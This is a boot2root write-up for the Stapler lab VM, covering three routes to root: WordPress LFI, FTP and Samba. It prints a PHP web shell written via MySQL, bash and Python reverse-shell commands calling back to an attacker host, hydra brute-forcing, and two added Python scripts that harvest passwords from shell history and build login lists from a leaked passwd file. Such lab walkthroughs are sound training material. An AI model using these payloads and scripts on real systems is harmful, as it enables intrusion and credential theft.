Stapler: 1 write up

Foreword

Today we are going to get root on Stapler, a VM created by g0tmi1k. I tried really hard on this VM, made multiple careless mistakes (e.g. overlooked some messages in the scan output) and almost got lost in a bunch of people's names while “dumpster diving” in the VM. But it is REALLY fun. I tried lots of approaches to pwn it.


Method 1 – web app exploiting

Recon

nmap

Trying to ssh or ftp in, and poking at that strange port 666, gives you a bunch of people's names; we will see them again later. Scanning port 80 turns out to be useless, but soon we find that port 12380 is another web service to have fun with.

By the way, connecting to port 666 with netcat gives you a .zip file, and an image once you unzip it. You will also get this message:

message.png

And this (real?) message after running strings on it:

cookie.png

Strange enough; I don’t know how to use it in the exploitation.

Anyway, let’s get back to a successful approach I tried.

nikto.png

Nikto on port 12380 tells us that SSL is in use and that there are three interesting directories: /admin112233, /blogblog/ and /phpmyadmin/. We find that /blogblog/ is running WordPress. After playing with it for a while, we find this plugin:

video.png

Let’s look for public exploits for this plugin, “advanced-video”. Luckily, we find one:

searchsploit

Exploit

It is an LFI exploit. Copy the .py file to our working directory, edit its URL to https://<Stapler’s IP>:12380/blogblog and run it, then browse to /wp-content/uploads under /blogblog/, where we can see the files it included:

files.png

They are named with random numbers, so we have to check them one by one to see whether any of them contains something interesting. Finally we find one containing the MySQL config. And luckily, the MySQL root user has no password! So let’s go to https://<Stapler’s IP>:12380/phpmyadmin and log in as “root” with an empty password.

Now we can drop a backdoor onto Stapler from here with a single SQL statement:

SELECT "<?php system($_GET['cmd']);?>" INTO OUTFILE "/var/www/https/blogblog/wp-content/uploads/cmd.php"

(You can type this statement into the text box that appears after clicking “database” at the top of the phpMyAdmin home page.)

This writes a PHP file into the directory shown above which reads a GET parameter called ‘cmd’ and passes it to the system shell, so you can run any Linux command you want through that parameter. Since /var/www/https is the document root of the 12380 site, the file is reachable at /blogblog/wp-content/uploads/cmd.php. (It works because MySQL root holds the FILE privilege and the MySQL server process can write into the uploads directory; with a restrictive secure_file_priv setting the INTO OUTFILE would be refused.) In practice, we mostly use it like this:

https://<Stapler's IP>:12380/blogblog/wp-content/uploads/cmd.php?cmd=bash -i >& /dev/tcp/<kali's IP>/443 0>&1

with netcat listening on port 443 to catch the shell. But this does not work here, since we have no permission to call “bash”. (Note also that the ‘&’ in ‘>&’ must be URL-encoded as %26 when the command goes through a query string; otherwise the web server treats everything after it as a separate parameter and PHP only ever sees “bash -i >”.) Luckily, we have an alternative:

https://<Stapler's IP>:12380/blogblog/wp-content/uploads/cmd.php?cmd=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<kali's IP>",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Credit to pentestmonkey. So we have a reverse shell now:

shell

We then find that there is a user called “peter” and a file called “sudo_as_admin_successful” in his home directory (Ubuntu creates this marker the first time a user runs sudo successfully, so peter is a sudoer). Interesting, but we have no permission to touch the things that belong to him. After some further searching, we discover that a user called JKanode has been doing something special:

Jkanode.png

So let’s check what commands this user has typed. Go to /home/JKanode and cat .bash_history: we get JKanode's password, and peter's too!

ssh_pass
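Added example, not from the original write-up: a Python helper that automates the dumpster diving above. It finds the shell history files under /home that the current (low-privilege) user can actually read and pulls out commands that take a password on the command line (sshpass -p, mysql -p…, curl -u, smbclient -U user%pass). The regexes are mine, the lines in SAMPLE_HISTORY are constructed with made-up secrets, and the VM's real history is not reproduced here.

```python
"""Added example, not from the original write-up: hunt readable shell history
files for commands that carry a password on the command line."""
import os
import re
from typing import List, Tuple

# Each pattern captures the secret. Patterns are mine; extend as needed.
LEAK_PATTERNS = [
    # sshpass -p SECRET / -p 'SECRET' / -p "SECRET"
    re.compile(r"\bsshpass\s+-p\s*(?:'([^']*)'|\"([^\"]*)\"|(\S+))"),
    # mysql -u root -pSECRET  (a bare -p followed by a space prompts instead: no leak)
    re.compile(r"\bmysql\b.*\s-p(?!assword)(\S+)"),
    re.compile(r"\b(?:mysql|mysqladmin|mysqldump)\b.*--password=(\S+)"),
    # curl/wget -u user:pass
    re.compile(r"\b(?:curl|wget)\b.*(?:-u|--user)[ =](\S+:\S+)"),
    # smbclient -U user%pass
    re.compile(r"\bsmbclient\b.*\s-U\s*(\S+%\S+)"),
]

# Constructed sample lines with made-up secrets; not the VM's real history.
SAMPLE_HISTORY = [
    "ls -la",
    "sshpass -p Example123 ssh alice@localhost",
    "mysql -u root -pS3cret wordpress",
    "mysql -u root -p wordpress",
    "curl -u admin:hunter2 https://intranet.example/",
    "cat /etc/passwd",
]


def find_leaks(lines) -> List[Tuple[int, str, str]]:
    """Return (line_number, secret, command) for every line that leaks a credential."""
    hits = []
    for n, line in enumerate(lines, 1):
        for pat in LEAK_PATTERNS:
            m = pat.search(line)
            if m:
                secret = next(g for g in m.groups() if g is not None)
                hits.append((n, secret, line.rstrip("\n")))
                break
    return hits


def history_files(root: str = "/home") -> List[str]:
    """History files under root that the current user can actually read.
    Other users' history is normally mode 0600, so from a www-data shell this
    lists exactly the misconfigured ones worth reading."""
    names = (".bash_history", ".zsh_history", ".sh_history", ".mysql_history")
    found: List[str] = []
    try:
        homes = sorted(os.listdir(root))
    except OSError:          # root missing or unreadable: nothing to scan
        return found
    for user in homes:
        for name in names:
            path = os.path.join(root, user, name)
            if os.path.isfile(path) and os.access(path, os.R_OK):
                found.append(path)
    return found


if __name__ == "__main__":
    for path in history_files():
        with open(path, errors="replace") as fh:
            for n, secret, cmd in find_leaks(fh):
                print(f"{path}:{n}: {secret!r}  <- {cmd}")
```

Run it from the reverse shell (python is available on the box even though bash is not callable) to list every readable history file and the credentials in it; the patterns deliberately ignore a bare “mysql -p”, which prompts interactively and leaks nothing.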

So we can now SSH into Stapler with peter’s password. Since peter can sudo, we can change root’s password to anything we wish! Done! Below is the flag:

flag


Method 2 – FTP

Recon

Since FTP is running on Stapler, why don’t we try to log in as anonymous? We find a file called note in the anonymous account:

ftp

So what is this note for?

elly

Exploit

Update the payload? There must be something to discover in Elly’s FTP account. So let’s see if we can brute-force our way in:

elly_login

Lucky for us! Elly is using a weak password!

*Remark: -e nsr tells the brute-forcer to also try, for each login, a null password (n), the username itself as the password (s) and the reversed username as the password (r).

After poking around in Elly’s FTP account, we find a file called passwd which looks like a copy of /etc/passwd. Using cut -d ':' -f1 passwd > pass.txt to put all the usernames into a file named pass.txt, we can brute-force SSH again using this name list:

ssh_acc.png
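Added example (mine, not the write-up's): the passwd-to-userlist step in Python instead of cut, plus a generator that spells out the three guesses -e nsr adds per login. It assumes the brute-forcer in the screenshots is hydra, where -e nsr has exactly this meaning, and goes a little beyond the one-liner by optionally dropping accounts whose shell is nologin/false (a guessed password there would not give a shell). The contents of SAMPLE_PASSWD are constructed, not the VM's file.

```python
"""Added example, not from the original write-up: build an SSH login list from a
leaked passwd file and spell out the guesses that hydra's -e nsr adds per login."""
from typing import Dict, List

# Constructed sample, not the VM's real passwd file.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
git:x:999:999::/srv/git:/bin/bash
elly:x:1000:1000:Elly,,,:/home/elly:/bin/bash
peter:x:1001:1001:Peter,,,:/home/peter:/bin/zsh
svc:x:1002:1002:Service:/var/svc:/bin/false
"""

NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false", "/bin/sync"}


def login_users(passwd_text: str, include_system: bool = False,
                include_nologin: bool = False) -> List[str]:
    """Usernames from a passwd file, in file order.

    By default accounts with a nologin/false shell are dropped (a guessed
    password would not yield a shell) and so are UIDs below 1000 other than
    root; set the flags to keep them, e.g. when the goal is only to learn
    which accounts reuse their username as a password.
    """
    users: List[str] = []
    for line in passwd_text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:          # malformed line: skip rather than guess
            continue
        name, _pw, uid, _gid, _gecos, _home, shell = fields
        if not include_nologin and shell in NOLOGIN_SHELLS:
            continue
        if not include_system and name != "root" and int(uid) < 1000:
            continue
        users.append(name)
    return users


def nsr_candidates(user: str) -> List[str]:
    """The three guesses hydra's -e nsr tries for a login:
    n = null password, s = same as the login, r = the login reversed."""
    return ["", user, user[::-1]]


def nsr_wordlist(users: List[str]) -> Dict[str, List[str]]:
    """Pair every login with its -e nsr guesses, as the brute-forcer would."""
    return {u: nsr_candidates(u) for u in users}


if __name__ == "__main__":
    users = login_users(SAMPLE_PASSWD)
    # The list written here is what you would feed to:
    #   hydra -L users.txt -e nsr ssh://<Stapler's IP>
    with open("users.txt", "w") as fh:
        fh.write("\n".join(users) + "\n")
    for user, guesses in nsr_wordlist(users).items():
        print(user, guesses)
```

With the sample file the default list is root, elly and peter; passing include_nologin=True keeps svc as well, and include_system=True keeps git, which is useful when the leaked file is the only username source and you would rather over-try than miss an account.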

Once we have access, we can use the same method as above to get peter’s password and do anything as root. Done.


Method 3 – Samba

Recon

Since Samba is running on port 139, we can use enum4linux to enumerate usernames:

smb.png

Again, you can try to brute-force these usernames.


Afterword

Quite a long journey (compared with the previous boot2root VMs I have tackled, the Kioptrix series). Did a lot of enumeration and searching. Tried hard, tried harder. Quite a great experience.
